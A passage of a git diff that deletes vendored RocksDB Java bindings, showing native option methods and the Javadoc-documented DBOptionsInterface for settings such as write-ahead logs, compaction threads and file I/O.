-  private native long walBytesPerSync(long handle);
-  private native void setEnableThreadTracking(long handle,
-      boolean enableThreadTracking);
-  private native boolean enableThreadTracking(long handle);
-  private native void setDelayedWriteRate(long handle, long delayedWriteRate);
-  private native long delayedWriteRate(long handle);
-  private native void setAllowConcurrentMemtableWrite(long handle,
-      boolean allowConcurrentMemtableWrite);
-  private native boolean allowConcurrentMemtableWrite(long handle);
-  private native void setEnableWriteThreadAdaptiveYield(long handle,
-      boolean enableWriteThreadAdaptiveYield);
-  private native boolean enableWriteThreadAdaptiveYield(long handle);
-  private native void setWriteThreadMaxYieldUsec(long handle,
-      long writeThreadMaxYieldUsec);
-  private native long writeThreadMaxYieldUsec(long handle);
-  private native void setWriteThreadSlowYieldUsec(long handle,
-      long writeThreadSlowYieldUsec);
-  private native long writeThreadSlowYieldUsec(long handle);
-  private native void setSkipStatsUpdateOnDbOpen(final long handle,
-      final boolean skipStatsUpdateOnDbOpen);
-  private native boolean skipStatsUpdateOnDbOpen(final long handle);
-  private native void setWalRecoveryMode(final long handle,
-      final byte walRecoveryMode);
-  private native byte walRecoveryMode(final long handle);
-  private native void setAllow2pc(final long handle,
-      final boolean allow2pc);
-  private native boolean allow2pc(final long handle);
-  private native void setRowCache(final long handle,
-      final long row_cache_handle);
-  private native void setFailIfOptionsFileError(final long handle,
-      final boolean failIfOptionsFileError);
-  private native boolean failIfOptionsFileError(final long handle);
-  private native void setDumpMallocStats(final long handle,
-      final boolean dumpMallocStats);
-  private native boolean dumpMallocStats(final long handle);
-  private native void setAvoidFlushDuringRecovery(final long handle,
-      final boolean avoidFlushDuringRecovery);
-  private native boolean avoidFlushDuringRecovery(final long handle);
-  private native void setAvoidFlushDuringShutdown(final long handle,
-      final boolean avoidFlushDuringShutdown);
-  private native boolean avoidFlushDuringShutdown(final long handle);
-
-  // instance variables
-  private Env env_;
-  private int numShardBits_;
-  private RateLimiter rateLimiter_;
-  private Cache rowCache_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptionsInterface.java
deleted file mode 100644
index 50ca083..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptionsInterface.java
+++ /dev/null
@@ -1,1549 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Collection;
-import java.util.List;
-
-public interface DBOptionsInterface<T extends DBOptionsInterface> {
-
-  /**
-   * Use this if your DB is very small (like under 1GB) and you don't want to
-   * spend lots of memory for memtables.
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeForSmallDb();
-
-  /**
-   * Use the specified object to interact with the environment,
-   * e.g. to read/write files, schedule background work, etc.
-   * Default: {@link Env#getDefault()}
-   *
-   * @param env {@link Env} instance.
-   * @return the instance of the current Options.
-   */
-  T setEnv(final Env env);
-
-  /**
-   * Returns the set RocksEnv instance.
-   *
-   * @return {@link RocksEnv} instance set in the options.
-   */
-  Env getEnv();
-
-  /**
-   * <p>By default, RocksDB uses only one background thread for flush and
-   * compaction. Calling this function will set it up such that total of
-   * `total_threads` is used.</p>
-   *
-   * <p>You almost definitely want to call this function if your system is
-   * bottlenecked by RocksDB.</p>
-   *
-   * @param totalThreads The total number of threads to be used by RocksDB.
-   *     A good value is the number of cores.
-   *
-   * @return the instance of the current Options
-   */
-  T setIncreaseParallelism(int totalThreads);
-
-  /**
-   * If this value is set to true, then the database will be created
-   * if it is missing during {@code RocksDB.open()}.
-   * Default: false
-   *
-   * @param flag a flag indicating whether to create a database the
-   *     specified database in {@link RocksDB#open(org.rocksdb.Options, String)} operation
-   *     is missing.
-   * @return the instance of the current Options
-   * @see RocksDB#open(org.rocksdb.Options, String)
-   */
-  T setCreateIfMissing(boolean flag);
-
-  /**
-   * Return true if the create_if_missing flag is set to true.
-   * If true, the database will be created if it is missing.
-   *
-   * @return true if the createIfMissing option is set to true.
-   * @see #setCreateIfMissing(boolean)
-   */
-  boolean createIfMissing();
-
-  /**
-   * <p>If true, missing column families will be automatically created</p>
-   *
-   * <p>Default: false</p>
-   *
-   * @param flag a flag indicating if missing column families shall be
-   *     created automatically.
-   * @return true if missing column families shall be created automatically
-   *     on open.
-   */
-  T setCreateMissingColumnFamilies(boolean flag);
-
-  /**
-   * Return true if the create_missing_column_families flag is set
-   * to true. If true column families be created if missing.
-   *
-   * @return true if the createMissingColumnFamilies is set to
-   *     true.
-   * @see #setCreateMissingColumnFamilies(boolean)
-   */
-  boolean createMissingColumnFamilies();
-
-  /**
-   * If true, an error will be thrown during RocksDB.open() if the
-   * database already exists.
-   * Default: false
-   *
-   * @param errorIfExists if true, an exception will be thrown
-   *     during {@code RocksDB.open()} if the database already exists.
-   * @return the reference to the current option.
-   * @see RocksDB#open(org.rocksdb.Options, String)
-   */
-  T setErrorIfExists(boolean errorIfExists);
-
-  /**
-   * If true, an error will be thrown during RocksDB.open() if the
-   * database already exists.
-   *
-   * @return if true, an error is raised when the specified database
-   *    already exists before open.
-   */
-  boolean errorIfExists();
-
-  /**
-   * If true, the implementation will do aggressive checking of the
-   * data it is processing and will stop early if it detects any
-   * errors.  This may have unforeseen ramifications: for example, a
-   * corruption of one DB entry may cause a large number of entries to
-   * become unreadable or for the entire DB to become unopenable.
-   * If any of the  writes to the database fails (Put, Delete, Merge, Write),
-   * the database will switch to read-only mode and fail all other
-   * Write operations.
-   * Default: true
-   *
-   * @param paranoidChecks a flag to indicate whether paranoid-check
-   *     is on.
-   * @return the reference to the current option.
-   */
-  T setParanoidChecks(boolean paranoidChecks);
-
-  /**
-   * If true, the implementation will do aggressive checking of the
-   * data it is processing and will stop early if it detects any
-   * errors.  This may have unforeseen ramifications: for example, a
-   * corruption of one DB entry may cause a large number of entries to
-   * become unreadable or for the entire DB to become unopenable.
-   * If any of the  writes to the database fails (Put, Delete, Merge, Write),
-   * the database will switch to read-only mode and fail all other
-   * Write operations.
-   *
-   * @return a boolean indicating whether paranoid-check is on.
-   */
-  boolean paranoidChecks();
-
-  /**
-   * Use to control write rate of flush and compaction. Flush has higher
-   * priority than compaction. Rate limiting is disabled if nullptr.
-   * Default: nullptr
-   *
-   * @param rateLimiter {@link org.rocksdb.RateLimiter} instance.
-   * @return the instance of the current object.
-   *
-   * @since 3.10.0
-   */
-  T setRateLimiter(RateLimiter rateLimiter);
-
-  /**
-   * <p>Any internal progress/error information generated by
-   * the db will be written to the Logger if it is non-nullptr,
-   * or to a file stored in the same directory as the DB
-   * contents if info_log is nullptr.</p>
-   *
-   * <p>Default: nullptr</p>
-   *
-   * @param logger {@link Logger} instance.
-   * @return the instance of the current object.
-   */
-  T setLogger(Logger logger);
-
-  /**
-   * <p>Sets the RocksDB log level. Default level is INFO</p>
-   *
-   * @param infoLogLevel log level to set.
-   * @return the instance of the current object.
-   */
-  T setInfoLogLevel(InfoLogLevel infoLogLevel);
-
-  /**
-   * <p>Returns currently set log level.</p>
-   * @return {@link org.rocksdb.InfoLogLevel} instance.
-   */
-  InfoLogLevel infoLogLevel();
-
-  /**
-   * Number of open files that can be used by the DB.  You may need to
-   * increase this if your database has a large working set. Value -1 means
-   * files opened are always kept open. You can estimate number of files based
-   * on {@code target_file_size_base} and {@code target_file_size_multiplier}
-   * for level-based compaction. For universal-style compaction, you can usually
-   * set it to -1.
-   * Default: 5000
-   *
-   * @param maxOpenFiles the maximum number of open files.
-   * @return the instance of the current object.
-   */
-  T setMaxOpenFiles(int maxOpenFiles);
-
-  /**
-   * Number of open files that can be used by the DB.  You may need to
-   * increase this if your database has a large working set. Value -1 means
-   * files opened are always kept open. You can estimate number of files based
-   * on {@code target_file_size_base} and {@code target_file_size_multiplier}
-   * for level-based compaction. For universal-style compaction, you can usually
-   * set it to -1.
-   *
-   * @return the maximum number of open files.
-   */
-  int maxOpenFiles();
-
-  /**
-   * If {@link #maxOpenFiles()} is -1, DB will open all files on DB::Open(). You
-   * can use this option to increase the number of threads used to open the
-   * files.
-   *
-   * Default: 16
-   *
-   * @param maxFileOpeningThreads the maximum number of threads to use to
-   *     open files
-   *
-   * @return the reference to the current options.
-   */
-  T setMaxFileOpeningThreads(int maxFileOpeningThreads);
-
-  /**
-   * If {@link #maxOpenFiles()} is -1, DB will open all files on DB::Open(). You
-   * can use this option to increase the number of threads used to open the
-   * files.
-   *
-   * Default: 16
-   *
-   * @return the maximum number of threads to use to open files
-   */
-  int maxFileOpeningThreads();
-
-  /**
-   * <p>Once write-ahead logs exceed this size, we will start forcing the
-   * flush of column families whose memtables are backed by the oldest live
-   * WAL file (i.e. the ones that are causing all the space amplification).
-   * </p>
-   * <p>If set to 0 (default), we will dynamically choose the WAL size limit to
-   * be [sum of all write_buffer_size * max_write_buffer_number] * 2</p>
-   * <p>Default: 0</p>
-   *
-   * @param maxTotalWalSize max total wal size.
-   * @return the instance of the current object.
-   */
-  T setMaxTotalWalSize(long maxTotalWalSize);
-
-  /**
-   * <p>Returns the max total wal size. Once write-ahead logs exceed this size,
-   * we will start forcing the flush of column families whose memtables are
-   * backed by the oldest live WAL file (i.e. the ones that are causing all
-   * the space amplification).</p>
-   *
-   * <p>If set to 0 (default), we will dynamically choose the WAL size limit
-   * to be [sum of all write_buffer_size * max_write_buffer_number] * 2
-   * </p>
-   *
-   * @return max total wal size
-   */
-  long maxTotalWalSize();
-
-  /**
-   * <p>Sets the statistics object which collects metrics about database operations.
-   * Statistics objects should not be shared between DB instances as
-   * it does not use any locks to prevent concurrent updates.</p>
-   *
-   * @return the instance of the current object.
-   * @see RocksDB#open(org.rocksdb.Options, String)
-   */
-  T setStatistics(final Statistics statistics);
-
-  /**
-   * <p>Returns statistics object.</p>
-   *
-   * @return the instance of the statistics object or null if there is no statistics object.
-   * @see #setStatistics(Statistics)
-   */
-  Statistics statistics();
-
-  /**
-   * <p>If true, then every store to stable storage will issue a fsync.</p>
-   * <p>If false, then every store to stable storage will issue a fdatasync.
-   * This parameter should be set to true while storing data to
-   * filesystem like ext3 that can lose files after a reboot.</p>
-   * <p>Default: false</p>
-   *
-   * @param useFsync a boolean flag to specify whether to use fsync
-   * @return the instance of the current object.
-   */
-  T setUseFsync(boolean useFsync);
-
-  /**
-   * <p>If true, then every store to stable storage will issue a fsync.</p>
-   * <p>If false, then every store to stable storage will issue a fdatasync.
-   * This parameter should be set to true while storing data to
-   * filesystem like ext3 that can lose files after a reboot.</p>
-   *
-   * @return boolean value indicating if fsync is used.
-   */
-  boolean useFsync();
-
-  /**
-   * A list of paths where SST files can be put into, with its target size.
-   * Newer data is placed into paths specified earlier in the vector while
-   * older data gradually moves to paths specified later in the vector.
-   *
-   * For example, you have a flash device with 10GB allocated for the DB,
-   * as well as a hard drive of 2TB, you should config it to be:
-   *    [{"/flash_path", 10GB}, {"/hard_drive", 2TB}]
-   *
-   * The system will try to guarantee data under each path is close to but
-   * not larger than the target size. But current and future file sizes used
-   * by determining where to place a file are based on best-effort estimation,
-   * which means there is a chance that the actual size under the directory
-   * is slightly more than target size under some workloads. User should give
-   * some buffer room for those cases.
-   *
-   * If none of the paths has sufficient room to place a file, the file will
-   * be placed to the last path anyway, despite to the target size.
-   *
-   * Placing newer data to earlier paths is also best-efforts. User should
-   * expect user files to be placed in higher levels in some extreme cases.
-   *
-   * If left empty, only one path will be used, which is db_name passed when
-   * opening the DB.
-   *
-   * Default: empty
-   *
-   * @param dbPaths the paths and target sizes
-   *
-   * @return the reference to the current options
-   */
-  T setDbPaths(final Collection<DbPath> dbPaths);
-
-  /**
-   * A list of paths where SST files can be put into, with its target size.
-   * Newer data is placed into paths specified earlier in the vector while
-   * older data gradually moves to paths specified later in the vector.
-   *
-   * For example, you have a flash device with 10GB allocated for the DB,
-   * as well as a hard drive of 2TB, you should config it to be:
-   *    [{"/flash_path", 10GB}, {"/hard_drive", 2TB}]
-   *
-   * The system will try to guarantee data under each path is close to but
-   * not larger than the target size. But current and future file sizes used
-   * by determining where to place a file are based on best-effort estimation,
-   * which means there is a chance that the actual size under the directory
-   * is slightly more than target size under some workloads. User should give
-   * some buffer room for those cases.
-   *
-   * If none of the paths has sufficient room to place a file, the file will
-   * be placed to the last path anyway, despite to the target size.
-   *
-   * Placing newer data to earlier paths is also best-efforts. User should
-   * expect user files to be placed in higher levels in some extreme cases.
-   *
-   * If left empty, only one path will be used, which is db_name passed when
-   * opening the DB.
-   *
-   * Default: {@link java.util.Collections#emptyList()}
-   *
-   * @return dbPaths the paths and target sizes
-   */
-  List<DbPath> dbPaths();
-
-  /**
-   * This specifies the info LOG dir.
-   * If it is empty, the log files will be in the same dir as data.
-   * If it is non empty, the log files will be in the specified dir,
-   * and the db data dir's absolute path will be used as the log file
-   * name's prefix.
-   *
-   * @param dbLogDir the path to the info log directory
-   * @return the instance of the current object.
-   */
-  T setDbLogDir(String dbLogDir);
-
-  /**
-   * Returns the directory of info log.
-   *
-   * If it is empty, the log files will be in the same dir as data.
-   * If it is non empty, the log files will be in the specified dir,
-   * and the db data dir's absolute path will be used as the log file
-   * name's prefix.
-   *
-   * @return the path to the info log directory
-   */
-  String dbLogDir();
-
-  /**
-   * This specifies the absolute dir path for write-ahead logs (WAL).
-   * If it is empty, the log files will be in the same dir as data,
-   *   dbname is used as the data dir by default
-   * If it is non empty, the log files will be in kept the specified dir.
-   * When destroying the db,
-   *   all log files in wal_dir and the dir itself is deleted
-   *
-   * @param walDir the path to the write-ahead-log directory.
-   * @return the instance of the current object.
-   */
-  T setWalDir(String walDir);
-
-  /**
-   * Returns the path to the write-ahead-logs (WAL) directory.
-   *
-   * If it is empty, the log files will be in the same dir as data,
-   *   dbname is used as the data dir by default
-   * If it is non empty, the log files will be in kept the specified dir.
-   * When destroying the db,
-   *   all log files in wal_dir and the dir itself is deleted
-   *
-   * @return the path to the write-ahead-logs (WAL) directory.
-   */
-  String walDir();
-
-  /**
-   * The periodicity when obsolete files get deleted. The default
-   * value is 6 hours. The files that get out of scope by compaction
-   * process will still get automatically delete on every compaction,
-   * regardless of this setting
-   *
-   * @param micros the time interval in micros
-   * @return the instance of the current object.
-   */
-  T setDeleteObsoleteFilesPeriodMicros(long micros);
-
-  /**
-   * The periodicity when obsolete files get deleted. The default
-   * value is 6 hours. The files that get out of scope by compaction
-   * process will still get automatically delete on every compaction,
-   * regardless of this setting
-   *
-   * @return the time interval in micros when obsolete files will be deleted.
-   */
-  long deleteObsoleteFilesPeriodMicros();
-
-  /**
-   * Suggested number of concurrent background compaction jobs, submitted to
-   * the default LOW priority thread pool.
-   * Default: 1
-   *
-   * @param baseBackgroundCompactions Suggested number of background compaction
-   *     jobs
-   */
-  void setBaseBackgroundCompactions(int baseBackgroundCompactions);
-
-  /**
-   * Suggested number of concurrent background compaction jobs, submitted to
-   * the default LOW priority thread pool.
-   * Default: 1
-   *
-   * @return Suggested number of background compaction jobs
-   */
-  int baseBackgroundCompactions();
-
-  /**
-   * Specifies the maximum number of concurrent background compaction jobs,
-   * submitted to the default LOW priority thread pool.
-   * If you're increasing this, also consider increasing number of threads in
-   * LOW priority thread pool. For more information, see
-   * Default: 1
-   *
-   * @param maxBackgroundCompactions the maximum number of background
-   *     compaction jobs.
-   * @return the instance of the current object.
-   *
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   * @see #maxBackgroundFlushes()
-   */
-  T setMaxBackgroundCompactions(int maxBackgroundCompactions);
-
-  /**
-   * Returns the maximum number of concurrent background compaction jobs,
-   * submitted to the default LOW priority thread pool.
-   * When increasing this number, we may also want to consider increasing
-   * number of threads in LOW priority thread pool.
-   * Default: 1
-   *
-   * @return the maximum number of concurrent background compaction jobs.
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   */
-  int maxBackgroundCompactions();
-
-  /**
-   * This value represents the maximum number of threads that will
-   * concurrently perform a compaction job by breaking it into multiple,
-   * smaller ones that are run simultaneously.
-   * Default: 1 (i.e. no subcompactions)
-   *
-   * @param maxSubcompactions The maximum number of threads that will
-   *     concurrently perform a compaction job
-   */
-  void setMaxSubcompactions(int maxSubcompactions);
-
-  /**
-   * This value represents the maximum number of threads that will
-   * concurrently perform a compaction job by breaking it into multiple,
-   * smaller ones that are run simultaneously.
-   * Default: 1 (i.e. no subcompactions)
-   *
-   * @return The maximum number of threads that will concurrently perform a
-   *     compaction job
-   */
-  int maxSubcompactions();
-
-  /**
-   * Specifies the maximum number of concurrent background flush jobs.
-   * If you're increasing this, also consider increasing number of threads in
-   * HIGH priority thread pool. For more information, see
-   * Default: 1
-   *
-   * @param maxBackgroundFlushes number of max concurrent flush jobs
-   * @return the instance of the current object.
-   *
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   * @see #maxBackgroundCompactions()
-   */
-  T setMaxBackgroundFlushes(int maxBackgroundFlushes);
-
-  /**
-   * Returns the maximum number of concurrent background flush jobs.
-   * If you're increasing this, also consider increasing number of threads in
-   * HIGH priority thread pool. For more information, see
-   * Default: 1
-   *
-   * @return the maximum number of concurrent background flush jobs.
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   */
-  int maxBackgroundFlushes();
-
-  /**
-   * Specifies the maximum size of a info log file. If the current log file
-   * is larger than `max_log_file_size`, a new info log file will
-   * be created.
-   * If 0, all logs will be written to one log file.
-   *
-   * @param maxLogFileSize the maximum size of a info log file.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setMaxLogFileSize(long maxLogFileSize);
-
-  /**
-   * Returns the maximum size of a info log file. If the current log file
-   * is larger than this size, a new info log file will be created.
-   * If 0, all logs will be written to one log file.
-   *
-   * @return the maximum size of the info log file.
-   */
-  long maxLogFileSize();
-
-  /**
-   * Specifies the time interval for the info log file to roll (in seconds).
-   * If specified with non-zero value, log file will be rolled
-   * if it has been active longer than `log_file_time_to_roll`.
-   * Default: 0 (disabled)
-   *
-   * @param logFileTimeToRoll the time interval in seconds.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setLogFileTimeToRoll(long logFileTimeToRoll);
-
-  /**
-   * Returns the time interval for the info log file to roll (in seconds).
-   * If specified with non-zero value, log file will be rolled
-   * if it has been active longer than `log_file_time_to_roll`.
-   * Default: 0 (disabled)
-   *
-   * @return the time interval in seconds.
-   */
-  long logFileTimeToRoll();
-
-  /**
-   * Specifies the maximum number of info log files to be kept.
-   * Default: 1000
-   *
-   * @param keepLogFileNum the maximum number of info log files to be kept.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setKeepLogFileNum(long keepLogFileNum);
-
-  /**
-   * Returns the maximum number of info log files to be kept.
-   * Default: 1000
-   *
-   * @return the maximum number of info log files to be kept.
-   */
-  long keepLogFileNum();
-
-  /**
-   * Recycle log files.
-   *
-   * If non-zero, we will reuse previously written log files for new
-   * logs, overwriting the old data.  The value indicates how many
-   * such files we will keep around at any point in time for later
-   * use.
-   *
-   * This is more efficient because the blocks are already
-   * allocated and fdatasync does not need to update the inode after
-   * each write.
-   *
-   * Default: 0
-   *
-   * @param recycleLogFileNum the number of log files to keep for recycling
-   *
-   * @return the reference to the current options
-   */
-  T setRecycleLogFileNum(long recycleLogFileNum);
-
-  /**
-   * Recycle log files.
-   *
-   * If non-zero, we will reuse previously written log files for new
-   * logs, overwriting the old data.  The value indicates how many
-   * such files we will keep around at any point in time for later
-   * use.
-   *
-   * This is more efficient because the blocks are already
-   * allocated and fdatasync does not need to update the inode after
-   * each write.
-   *
-   * Default: 0
-   *
-   * @return the number of log files kept for recycling
-   */
-  long recycleLogFileNum();
-
-  /**
-   * Manifest file is rolled over on reaching this limit.
-   * The older manifest file be deleted.
-   * The default value is MAX_INT so that roll-over does not take place.
-   *
-   * @param maxManifestFileSize the size limit of a manifest file.
-   * @return the instance of the current object.
-   */
-  T setMaxManifestFileSize(long maxManifestFileSize);
-
-  /**
-   * Manifest file is rolled over on reaching this limit.
-   * The older manifest file be deleted.
-   * The default value is MAX_INT so that roll-over does not take place.
-   *
-   * @return the size limit of a manifest file.
-   */
-  long maxManifestFileSize();
-
-  /**
-   * Number of shards used for table cache.
-   *
-   * @param tableCacheNumshardbits the number of chards
-   * @return the instance of the current object.
-   */
-  T setTableCacheNumshardbits(int tableCacheNumshardbits);
-
-  /**
-   * Number of shards used for table cache.
-   *
-   * @return the number of shards used for table cache.
-   */
-  int tableCacheNumshardbits();
-
-  /**
-   * {@link #walTtlSeconds()} and {@link #walSizeLimitMB()} affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   * the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   *    WAL files will be checked every 10 min and if total size is greater
-   *    then WAL_size_limit_MB, they will be deleted starting with the
-   *    earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   *    WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-   *    are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   *    checks will be performed with ttl being first.</li>
-   * </ol>
-   *
-   * @param walTtlSeconds the ttl seconds
-   * @return the instance of the current object.
-   * @see #setWalSizeLimitMB(long)
-   */
-  T setWalTtlSeconds(long walTtlSeconds);
-
-  /**
-   * WalTtlSeconds() and walSizeLimitMB() affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   * the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   * WAL files will be checked every 10 min and if total size is greater
-   * then WAL_size_limit_MB, they will be deleted starting with the
-   * earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   * WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-   * are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   * checks will be performed with ttl being first.</li>
-   * </ol>
-   *
-   * @return the wal-ttl seconds
-   * @see #walSizeLimitMB()
-   */
-  long walTtlSeconds();
-
-  /**
-   * WalTtlSeconds() and walSizeLimitMB() affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   *    the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   *    WAL files will be checked every 10 min and if total size is greater
-   *    then WAL_size_limit_MB, they will be deleted starting with the
-   *    earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   *    WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-   *    are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   *    checks will be performed with ttl being first.</li>
-   * </ol>
-   *
-   * @param sizeLimitMB size limit in mega-bytes.
-   * @return the instance of the current object.
-   * @see #setWalSizeLimitMB(long)
-   */
-  T setWalSizeLimitMB(long sizeLimitMB);
-
-  /**
-   * {@link #walTtlSeconds()} and {@code #walSizeLimitMB()} affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   *    the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   *    WAL files will be checked every 10 min and if total size is greater
-   *    then WAL_size_limit_MB, they will be deleted starting with the
-   *    earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   *    WAL files will be checked every WAL_ttl_seconds i / 2 and those that
-   *    are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   *    checks will be performed with ttl being first.</li>
-   * </ol>
-   * @return size limit in mega-bytes.
-   * @see #walSizeLimitMB()
-   */
-  long walSizeLimitMB();
-
-  /**
-   * Number of bytes to preallocate (via fallocate) the manifest
-   * files.  Default is 4mb, which is reasonable to reduce random IO
-   * as well as prevent overallocation for mounts that preallocate
-   * large amounts of data (such as xfs's allocsize option).
-   *
-   * @param size the size in byte
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setManifestPreallocationSize(long size);
-
-  /**
-   * Number of bytes to preallocate (via fallocate) the manifest
-   * files.  Default is 4mb, which is reasonable to reduce random IO
-   * as well as prevent overallocation for mounts that preallocate
-   * large amounts of data (such as xfs's allocsize option).
-   *
-   * @return size in bytes.
-   */
-  long manifestPreallocationSize();
-
-  /**
-   * Enable the OS to use direct I/O for reading sst tables.
-   * Default: false
-   *
-   * @param useDirectReads if true, then direct read is enabled
-   * @return the instance of the current object.
-   */
-  T setUseDirectReads(boolean useDirectReads);
-
-  /**
-   * Enable the OS to use direct I/O for reading sst tables.
-   * Default: false
-   *
-   * @return if true, then direct reads are enabled
-   */
-  boolean useDirectReads();
-
-  /**
-   * Enable the OS to use direct reads and writes in flush and
-   * compaction
-   * Default: false
-   *
-   * @param useDirectIoForFlushAndCompaction if true, then direct
-   *        I/O will be enabled for background flush and compactions
-   * @return the instance of the current object.
-   */
-  T setUseDirectIoForFlushAndCompaction(boolean useDirectIoForFlushAndCompaction);
-
-  /**
-   * Enable the OS to use direct reads and writes in flush and
-   * compaction
-   *
-   * @return if true, then direct I/O is enabled for flush and
-   *         compaction
-   */
-  boolean useDirectIoForFlushAndCompaction();
-
-  /**
-   * Whether fallocate calls are allowed
-   *
-   * @param allowFAllocate false if fallocate() calls are bypassed
-   *
-   * @return the reference to the current options.
-   */
-  T setAllowFAllocate(boolean allowFAllocate);
-
-  /**
-   * Whether fallocate calls are allowed
-   *
-   * @return false if fallocate() calls are bypassed
-   */
-  boolean allowFAllocate();
-
-  /**
-   * Allow the OS to mmap file for reading sst tables.
-   * Default: false
-   *
-   * @param allowMmapReads true if mmap reads are allowed.
-   * @return the instance of the current object.
-   */
-  T setAllowMmapReads(boolean allowMmapReads);
-
-  /**
-   * Allow the OS to mmap file for reading sst tables.
-   * Default: false
-   *
-   * @return true if mmap reads are allowed.
-   */
-  boolean allowMmapReads();
-
-  /**
-   * Allow the OS to mmap file for writing. Default: false
-   *
-   * @param allowMmapWrites true if mmap writes are allowd.
-   * @return the instance of the current object.
-   */
-  T setAllowMmapWrites(boolean allowMmapWrites);
-
-  /**
-   * Allow the OS to mmap file for writing. Default: false
-   *
-   * @return true if mmap writes are allowed.
-   */
-  boolean allowMmapWrites();
-
-  /**
-   * Disable child process inherit open files. Default: true
-   *
-   * @param isFdCloseOnExec true if child process inheriting open
-   *     files is disabled.
-   * @return the instance of the current object.
-   */
-  T setIsFdCloseOnExec(boolean isFdCloseOnExec);
-
-  /**
-   * Disable child process inherit open files. Default: true
-   *
-   * @return true if child process inheriting open files is disabled.
-   */
-  boolean isFdCloseOnExec();
-
-  /**
-   * if not zero, dump rocksdb.stats to LOG every stats_dump_period_sec
-   * Default: 600 (10 minutes)
-   *
-   * @param statsDumpPeriodSec time interval in seconds.
-   * @return the instance of the current object.
-   */
-  T setStatsDumpPeriodSec(int statsDumpPeriodSec);
-
-  /**
-   * If not zero, dump rocksdb.stats to LOG every stats_dump_period_sec
-   * Default: 600 (10 minutes)
-   *
-   * @return time interval in seconds.
-   */
-  int statsDumpPeriodSec();
-
-  /**
-   * If set true, will hint the underlying file system that the file
-   * access pattern is random, when a sst file is opened.
-   * Default: true
-   *
-   * @param adviseRandomOnOpen true if hinting random access is on.
-   * @return the instance of the current object.
-   */
-  T setAdviseRandomOnOpen(boolean adviseRandomOnOpen);
-
-  /**
-   * If set true, will hint the underlying file system that the file
-   * access pattern is random, when a sst file is opened.
-   * Default: true
-   *
-   * @return true if hinting random access is on.
-   */
-  boolean adviseRandomOnOpen();
-
-  /**
-   * Amount of data to build up in memtables across all column
-   * families before writing to disk.
-   *
-   * This is distinct from {@link ColumnFamilyOptions#writeBufferSize()},
-   * which enforces a limit for a single memtable.
-   *
-   * This feature is disabled by default. Specify a non-zero value
-   * to enable it.
-   *
-   * Default: 0 (disabled)
-   *
-   * @param dbWriteBufferSize the size of the write buffer
-   *
-   * @return the reference to the current options.
-   */
-  T setDbWriteBufferSize(long dbWriteBufferSize);
-
-  /**
-   * Amount of data to build up in memtables across all column
-   * families before writing to disk.
-   *
-   * This is distinct from {@link ColumnFamilyOptions#writeBufferSize()},
-   * which enforces a limit for a single memtable.
-   *
-   * This feature is disabled by default. Specify a non-zero value
-   * to enable it.
-   *
-   * Default: 0 (disabled)
-   *
-   * @return the size of the write buffer
-   */
-  long dbWriteBufferSize();
-
-  /**
-   * Specify the file access pattern once a compaction is started.
-   * It will be applied to all input files of a compaction.
-   *
-   * Default: {@link AccessHint#NORMAL}
-   *
-   * @param accessHint The access hint
-   *
-   * @return the reference to the current options.
-   */
-  T setAccessHintOnCompactionStart(final AccessHint accessHint);
-
-  /**
-   * Specify the file access pattern once a compaction is started.
-   * It will be applied to all input files of a compaction.
-   *
-   * Default: {@link AccessHint#NORMAL}
-   *
-   * @return The access hint
-   */
